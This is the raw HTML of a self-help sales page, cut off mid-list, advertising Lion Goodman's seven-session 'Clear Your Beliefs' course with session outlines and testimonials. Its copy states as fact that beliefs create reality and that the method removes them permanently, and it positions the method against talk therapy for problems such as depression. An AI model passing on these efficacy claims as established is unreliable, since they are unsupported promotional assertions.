consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and 